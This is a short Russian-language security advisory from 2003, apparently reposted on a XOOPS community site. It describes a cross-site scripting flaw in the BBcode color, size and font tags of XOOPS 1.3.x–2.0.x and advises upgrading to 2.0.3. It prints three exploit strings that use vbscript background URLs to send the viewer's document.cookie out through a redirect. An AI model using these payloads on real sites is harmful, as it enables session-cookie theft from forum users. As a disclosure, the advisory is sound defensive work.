Межсайтовый скриптинг в BBcode тэгах в XOOPS

Дата 14.08.2003 г. 11:41:39
Тема: Безопасность


Уязвимость обнаружена в систему управления содержанием XOOPS. Удаленный пользователь может выполнить XSS нападение.

Удаленный атакующий может внедрить произвольный код сценария в некоторые BBcode тэги, который будет выполнен в браузере пользователя, просматривающего злонамеренное сообщение. Уязвимость может использоваться в модулях - Private Messages, News и NewBB (forum). Эксплоит:

{color=FFFFFF;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+
Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color]

{size=10;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+
Chr(101)+Chr(102)+document.cookie))]a[/size]

{font=Verdana;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+
Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/font]

Уязвимость обнаружена в XOOPS 1.3.x-2.0.x
Для устранения уязвимости, установите обновленную версию программы (2.0.3)

http://www.securitylab.ru



Эта Статья взята с Сайта XOOPS Russia
http://xoops.ru

URL этой Статьи:
http://xoops.ru/article.php?storyid=249